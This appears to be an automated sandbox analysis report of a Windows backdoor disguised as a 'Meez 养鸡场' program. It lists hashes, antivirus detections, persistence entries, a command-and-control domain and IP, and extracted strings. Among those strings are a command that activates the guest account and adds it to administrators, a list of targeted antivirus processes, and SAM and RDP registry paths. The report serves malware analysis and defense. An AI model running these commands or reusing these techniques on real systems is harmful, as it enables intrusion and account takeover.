Analysis Date2015-01-17 00:48:38
MD56e845933d12845543ac26f76def9c134
SHA15385e9ebaa72dfe5c7d686cc59ef9886d7eca307

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 408c6b5554f81726850ec3036ce12631 sha1: 7f7404bc269c19af7af794993f5d1004c826c8a1 size: 217088
Section.rdata md5: 005bf0b4910e15acfb1ee29fe516226a sha1: d95f424b46cc52c994dcbd329262a254cf2cfbd6 size: 16384
Section.data md5: 8cc51e7b23126d5176a931e099a55faa sha1: 699c63c04a2e513502a14bad5cc6482fc683d045 size: 8192
Section.idata md5: 75bcbfe60272448e1523b58690b370b5 sha1: 29164290b67600ec02eee7285b60ba0f940f85ef size: 8192
Section.rsrc md5: eb4ef82a01a1750dc8c4f0bf58f42a07 sha1: c1f6534782b83dc4410d3ae4c73483752a084156 size: 45056
Section.reloc md5: db9b3f9dbe8010d2ab13788f444cd7b6 sha1: 476308e072143bc1dcee1f49979c11d860fdc915 size: 8192
Timestamp2014-01-15 12:39:35
Pdb path@
VersionLegalCopyright: 版权所有(C) 2014
InternalName: 养鸡场
FileVersion: 1, 0, 0, 1
CompanyName: Meez
PrivateBuild:
LegalTrademarks:
Comments:
ProductName: Meez 养鸡场
SpecialBuild:
ProductVersion: 1, 0, 0, 1
FileDescription: 养鸡场
OriginalFilename: 养鸡场.exe
PackerMicrosoft Visual C++ v6.0
PEhashf6fdaafcbe6806a9d2d5db07921dc691bdf622f6
IMPhash29aa249fa0ff3ca2f03b829c4a3d4675
AV360 Safeno_virus
AVAd-AwareGeneric.Malware.SP!VPkg.12A98305
AVAlwil (avast)Farfli-BD [Trj]
AVArcabit (arcavir)Generic.Malware.SP!VPkg.12A98305
AVAuthentiumW32/KillAV.AU.gen!Eldorado
AVAvira (antivir)BDS/Backdoor.A.2103
AVBullGuardGeneric.Malware.SP!VPkg.12A98305
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Agen.r6
AVClamAVno_virus
AVDr. WebTrojan.DownLoader9.21367
AVEmsisoftGeneric.Malware.SP!VPkg.12A98305
AVEset (nod32)Win32/Farfli.ADG
AVFortinetW32/Dialer.ASVR!tr
AVFrisk (f-prot)W32/KillAV.AU.gen!Eldorado
AVF-SecureGeneric.Malware.SP!VPkg.12A98305
AVGrisoft (avg)BackDoor.Generic_r.FLT
AVIkarusBackdoor.Win32.Farfli
AVK7no_virus
AVKasperskyTrojan.Win32.Agent.aegqp
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojan:Win32/Beaugrit.gen!AAA
AVMicroWorld (escan)Generic.Malware.SP!VPkg.12A98305
AVRisingBackdoor.Farfli!4858
AVSophosMal/Behav-027
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.P2P-Worm.Palevo

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\V587\\xd3\\xd0\\xc4\\xda\\xba\\xad ➝
C:\malware.exe\\x00
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\guanxige.exe
Creates File\Device\Afd\Endpoint
Creates Mutexbing852.f3322.org

Network Details:

DNSbing852.f3322.org
Type: A
59.188.4.101
Flows TCP192.168.1.1:1031 ➝ 59.188.4.101:5555
Flows TCP192.168.1.1:1032 ➝ 59.188.4.101:5555
Flows TCP192.168.1.1:1033 ➝ 59.188.4.101:5555
Flows TCP192.168.1.1:1034 ➝ 59.188.4.101:5555
Flows TCP192.168.1.1:1035 ➝ 59.188.4.101:5555
Flows TCP192.168.1.1:1036 ➝ 59.188.4.101:5555

Raw Pcap
0x00000000 (00000)   41314345 41                           A1CEA

0x00000000 (00000)   41314345 41                           A1CEA

0x00000000 (00000)   41314345 410101                       A1CEA..

0x00000000 (00000)   41314345 410101                       A1CEA..

0x00000000 (00000)   41314345 410101                       A1CEA..

0x00000000 (00000)   41314345 410101                       A1CEA..


Strings
VirtualAlloc
VirtualAlloc
A1CEA
ConvertSidToStringSidA
CreateDirectoryA
\
WinSta0\Default
g%s\*.*
hh
%s\*.*
ijpp
WinSta0\Default
WinSta0\Default
WinSta0\Default
REG_SZ
%-24s %-15s %s 
n
RegCreateKeyExA
CreatePipe
GetSystemDirectoryA
\cmd.exe
CreateProcessA
.
TerminateThread
TerminateProcess
WaitForSingleObject
DisconnectNamedPipe
Sleep
PeekNamedPipe
ReadFile
TerminateThread
TerminateProcess
WaitForMultipleObjects
USER32.dll
wsprintfA
fKERNEL32.dll
GetSystemInfo
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
.
[Z
NOD32
avast..
F-Secure..
F-Secure..
Q
Active
Connected
ConnectQuery
Shadow
Disconnected
Idle
Listen
Reset
Down
Init
RS
/P
SAM\SAM\Domains\Account\Users\
MNSAM\SAM\Domains\Account\Users\Names\
KL
JIJ
KGSYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server
PortNumber
fDenyTSConnections
net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add
pOpkernel32.dll
FreeLibrary
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Policies\Microsoft\Windows\Installer
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SYSTEM\CurrentControlSet\Services\TermDD
SYSTEM\CurrentControlSet\Services\TermService
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
SYSTEM\CurrentControlSet\Services\TermService\Parameters
SYSTEM\CurrentControlSet\Control\Terminal Server
ShutdownWithoutLogon
EnableAdminTSRemote
KeepRASConnections
Start
TSEnabled
EnableConcurrentSessions
ServiceDll
TermService
fDenyTSConnections
:\
SYSTEM\CurrentControlSet\Services\TermService\Parameters
.
}
~Process32Next
SetEvent
CreateEventA
WaitForSingleObject
Process32First
explorer.exe
GetCurrentThreadId
GetCurrentThreadId
GetCurrentThreadId
Winlogon
.
.

080404b0
1, 0, 0, 1
(C) 2014
Comments
CompanyName
.exe
FileDescription
FileVersion
InternalName
jjjj
jjjjj
jjjjjj
jjjjjjj
LegalCopyright
LegalTrademarks
Meez
Meez 
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
<$<.<;<|<
>">&>*>
                                        
								
00000%s
0!0&0,030h0m0s0z0
0$0)030c0t0y0
"0(0.040:0@0F0L0R0X0
0!0/0c0q0
0 0<0P0l0
0 051;1B1o1{1
0,090Z0_0y0
0@0W0~0
0#10151B1Y1f1}1T2Y2_2f2
010J0j0
;0,161L1g1t1
~0<1F1d1n1
>$>*>0>6><>B>H>N>T>Z>`>f>l>r>x>~>
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
=0C0J0W0v0
:0;D;_;
=0=L=`=h=|=
?0?L?`?h?
>0>L>T>h>
>0>:>T>y>
0y1!2h2r2
1$1*101:1?1c1j1q1x1~1
1 1$1(1,1014181<1@1
1 1'141F1>2T2c2m2
1 1'1V1
1+1A1J1m1s1
1#1S1d1i1s1
127.0.0.1
1'282E2
1-2F2R2
1 585H5
1(6@6T6d6h6
:1:9:?:N:j:t:{:
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
;1;D;I;Q;W;a;p;
;1;H;o;
>1?>?P?
??1type_info@@UAE@XZ
2008R2
2%2,232:2A2H2O2V2]2d2k2r2y2
2:2^2n2
2;2f2l2w2
2>2W2h2
2$3*303B3H3N3T3Z3`3f3l3r3x3~3
2`3B4O4
242>2H2v2
%-24s %-15s 
%-24s %-15s 0x%x(%d) 
253;3B3o3{3
253<3R3a3k3{3
>%>+>2>7>>>G>N>U>b>t>=?
=->2>8>?>
< <&<,<2<8<><D<J<P<V<\<b<h<n<t<z<
2C2T2Y2c2
??2@YAPAXI@Z
;;;2}}}z
3&303:3D3N3X3b3l3v3
3'3,323=3J3]3b3h3s3
3#3)343:3E4
333D3I3S3
360sd.exe
360tray.exe
>	>.>3>9>@>W>
=&=3=^=c=i=p=t>
>3>D>I>S>
;);3;E;L;\;l;
??3@YAXPAX@Z
42474=4D4
{4_^]3
4&404C4T4m4z4
4$4,41474>4
4-4]4{4
4 4&4,42484>4D4J4P4V4\4b4h4
4$4(4,4x4
4/4=4B4L4v4
4)464C4P4
4(494C4
>#?4?9?C?s?
="=(=.=4=:=@=F=L=R=X=^=d=j=p=v=|=
4I5[5h576r6
:4Y4f4j5#626
505N5S5Y5`5
5#5*575I5V5c5a6j6p6x6~6
555&:::::::B999G888>999/
5&6T6Z6F7t7z7f8
:5:I:_:
<$<)</<6<
61767<7C7
6 6$6(6,6064686<6$7
6"6L6Z6_6i6
6"7'717[7l7q7{7
6A7F7L7S7f7
:6:A:S:Y:
6D7H7L7P7T7X7\7`7d7h7
6h7m7$8)8}8
<6=o=~=
6Q6W6^6
>6>U>[>x>~>
708l8y8
7%727u7
7$7,9q9
7!8%8)8-8
7<8P8W8
7*9/959<9A9f9
7j7p7w7
=*>7>[>o>
:';7;P;i;
7P:Y:b:j:t:~:
868D8I8S8}8
8#808=8J8O8
8(808`8t8
8]8E9R9g9{9
8#9(9.959l9
8BBBgeee
:8:K:W:j:q:
<)<.<8<_<m<r<|<
;$;8;T;h;
:$:8:T:h:
9#989@9E9K9V9[9a9.:
9(9D9L9T9\9l9
9.9D9n9
9!9P9V:[:
9(9R9`9e9o9
9A:F:P:z:
9=:B:H:O:y:
9M:R:X:_:
;$;9;M;W;^;c;i;p;
>	?9?Q?a?q?
9_|t93
~(9~$u
a2guard.exe
***$AAA=VVVSWWW`VVVbWWWZJJJI4441
AbortSystemShutdownA
_acmdln
Active
AddAccessAllowedAce
_adjust_fdiv
AdjustTokenPrivileges
advapi32.dll
ADVAPI32.dll
ad-watch.exe
AllocateAndInitializeSid
Application
\Application Data\Microsoft\Netw
Applications\iexplore.exe\shell\open\command
ArcaTasksService.exe
ArcaVir
ashserv.exe
a-squared
AvastSvc.exe
avgnt.exe
avgwdsvc.exe
avp.exe
.?AVtype_info@@
AVWatchService.exe
>(?A?y?
AYAgent.aye
Aypcrtsl
bad Allocate
bad buffer
_beginthreadex
bing852.f3322.org
{bJQE[m
BKavService.exe
buffer error
calloc
CancelIo
ccSetMgr.exe
ccSvcHst.exe
C:\Documents and Settings\All Users\
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\guanxige.exe
cfp.exe
CharNextA
: ;&;-;C;H;N;U;
CKSoftShiedAntivirus4.exe
cleaner8.exe
ClearEventLogA
CloseDesktop
CloseEventLog
CloseHandle
CloseServiceHandle
CMCTrayIcon.exe
COMODO
CONNECT 
Console
_controlfp
ControlService
CopyFileA
Coranti2012
CorantiControlCenter32.exe
C:\progra~1\Common Files\svcchost.exe
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
CreateRemoteThread
CreateThread
CreateToolhelp32Snapshot
CRIPTION\Sys
csrss.exe
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
ctions\pbk\rasphone.pbk
=C=T=Y=c=
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\guanxige.exe
__CxxFrameHandler
_CxxThrowException
D0f041S1u1
D$(8D*
@.data
data error
%dDay %dHour %dMin
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
DeleteCriticalSection
DeleteFileA
DeleteService
Device
DialParamsUID
Disable
;D<J<S<Y<`<j<
__dllonexit
Documents an
drwtsn32.exe
;D$<s!
d Settings\
D$$SUV
egui.exe
}EhphC
empty distance tree with lengths
EnterCriticalSection
EnumProcessModules
EnumWindows
_errno
_except_handler3
\Exit 2014
ExitProcess
ExitWindowsEx
fDenyTSConnections
Fdf+Fh
file error
FindClose
Find CPU infomation error
FindFirstFileA
FindNextFileA
<F=L=S=
FortiTray.exe
F-PROT
F-PROT.EXE
FreeLibrary
FreeSid
fsav32.exe
fsavgui.exe
ger Error!
GetCurrentProcess
GetDiskFreeSpaceExA
GetDriveTypeA
GetFileAttributesA
GetFileSize
GetIfTable
GetLastError
GetLengthSid
GetLogicalDriveStringsA
__getmainargs
GetModuleFileNameA
GetModuleFileNameExA
GetModuleHandleA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetSystemDirectoryA
GetThreadDesktop
GetTickCount
GetTokenInformation
GetUserNameA
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GetWindowTextA
GetWindowThreadProcessId
GlobalMemoryStatusEx
\guanxige.exe
<H1>403 Forbidden</H1>
HARDWARE\DES
HARDWARE\DESCRIPTION\System\CentralProcessor\0
HeapAlloc
HeapFree
|$HPWS
<H<\<p<x<
HrCg@b	g(
http://
HTTP/1.0 200 OK
Http/1.1 403 Forbidden
? ?H?Y?c?
:	;I;b;Z<(=G=l=
.idata
Immunet
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
_initterm
insufficient memory
InterlockedExchange
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid stored block lengths
invalid window size
iphlpapi.dll
iptray.exe
IsValidSid
IsWindowVisible
=-===J=v=
;j;Z>J?y?
K7TSecurity.exe
kernel32.dll
KERNEL32.dll
knsdtray.exe
KSafeTray.EXE
KvMonXP.exe
kxetray.exe
Lavasoft
LeaveCriticalSection
lla/4.0 (compatible)
L$LQVS
LoadLibraryA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
L$,QWV
L$_RasDefaultCredentials#0
L$ RUPj
LsaClose
LsaFreeMemory
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyW
lstrlenA
malloc
_mbscmp
_mbsstr
mbstowcs
Mcshield.exe
memcmp
memcpy
memmove
memset
Microsoft\Network\Conne
Module32First
Module32Next
Mongoosa
MongoosaGUI.exe
MoveFileA
MsMpEng.exe
mssecess.exe
MSVCP60.dll
MSVCRT.dll
MultiByteToWideChar
n\ca`ZW&5
need dictionary
NETAPI32.dll
NetApiBufferFree
NetLocalGroupAddMembers
NetUserAdd
NetUserDel
NetUserEnum
NetUserGetInfo
NetUserGetLocalGroups
NetUserSetInfo
Norton
nProtect
nsocket-di:%d
nspupsvc.exe
o0s0w0{0
;%;O;];b;l;
_onexit
OpenDesktopA
OpenEventA
OpenEventLogA
OpenInputDesktop
OpenProcess
OpenProcessToken
OpenSCMana
OpenSCManagerA
OpenServiceA
OpenService Error!
OpenWindowStationA
ork\Connections\pbk\rasphone.pbk
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
?,???O?Y?c?
pA^PB6:=T
patray.exe
__p__commode
PCSHELL UP
__p__fmode
PhoneNumber
PortNumber
PostMessageA
Process32First
Process32Next
ProcessorNameString
przEO:>
PSafeSysTray.exe
PSAPI.DLL
pSVWhhsC
<p<u<{<
="=(=/=p>v>}>
QQPCTray.exe
QueryServiceStatus
QueryServiceStatus Error!
QUHLPSVC.EXE
QUICK HEAL
RasDialParams!%s#0
RavMonD.exe
`.rdata
RDP-Tcp
ReadFile
realloc
REG_BINARY
RegCloseKey
RegDeleteKeyA
RegDeleteValueA
REG_DWORD
RegEnumKeyExA
RegEnumValueA
REG_EXPAND_SZ
REG_MULTI_SZ
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegSetKeySecurity
RegSetValueExA
@.reloc
RemoveDirectoryA
remupd.exe
rename
ResetEvent
rhgghp
_RichV:
rpAT?9<T
<?=S=2>C>P>
SAM\SAM\Domains\Account\Users\Names\%s
SavProgress.exe
SBAMSvc.exe
%s:\Documents and Settings\Local User
Security
SeDebugPrivilege
SendMessageA
\Server\svchost\Release\yjc2014.pdb
ServiceDll
SeShutdownPrivilege
__set_app_type
SetErrorMode
SetEvent
SetFilePointer
SetProcessWindowStation
SetSecurityDescriptorDacl
SetThreadDesktop
__setusermatherr
sharedaccess
SHDeleteKeyA
SHELL32.dll
SHGetFileInfoA
SHGetSpecialFolderPathA
Shield Antivirus
shlwapi.dll
_snprintf
Sophos
sprintf
SpywareTerminator
SpywareTerminatorShield.exe
%s%s*.*
%s\shell\open\command
%s%s%s
StartServiceA
strcat
strchr
strcmp
strcpy
stream end
stream error
strlen
strncat
strncmp
strncpy
_strnicmp
strrchr
_strrev
strstr
strtok
_strupr
@SVW_^[
SVWhTbC
SVWhXhC
System
SYSTEM\CurrentControlSe
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
SYSTEM\CurrentControlSet\Services\
%SystemRoot%\system32\termsrv_t.dll
T+3x%A
T$DPVS
tem\CentralProcessor\0
TerminateProcess
TerminateThread
TermService
\termsrv.dll
termsrv_t
\termsrv_t.dll
= =T=f=w=L>
=T>h>|>
The Cleaner
!This program cannot be run in DOS mode.
t<h|sC
T$LPQR
T$LRWS
TMBMSRV.exe
TmProxy.exe
too many length or distance symbols
T$,PQh
T$(PQR
T$,RWV
t\Services\BITS
tZ9H tU9H$tP
U2a2p2
unknown compression method
UnThreat
UnThreat.exe
USER32.dll
uu8TAX
uy_eUNME
V3Svc.exe
vba32lder.exe
VirtualAllocEx
VirtualFree
VIRUSfighter
vsserv.exe
W(9W$u
WaitForSingleObject
wcscpy
wcslen
wcstombs
WideCharToMultiByte
Windows %s SP%d
WinExec
WININET.dll
winsta0
Win XP
WriteFile
WriteProcessMemory
WS2_32.dll
WSAIoctl
wsprintfA
WTSAPI32.dll
WTSDisconnectSession
WTSEnumerateSessionsA
WTSFreeMemory
WTSLogoffSession
WTSQuerySessionInformationA
WTSQuerySessionInformationW
|$ WUSV
_XcptFilter
xSVWj2
YdLKH~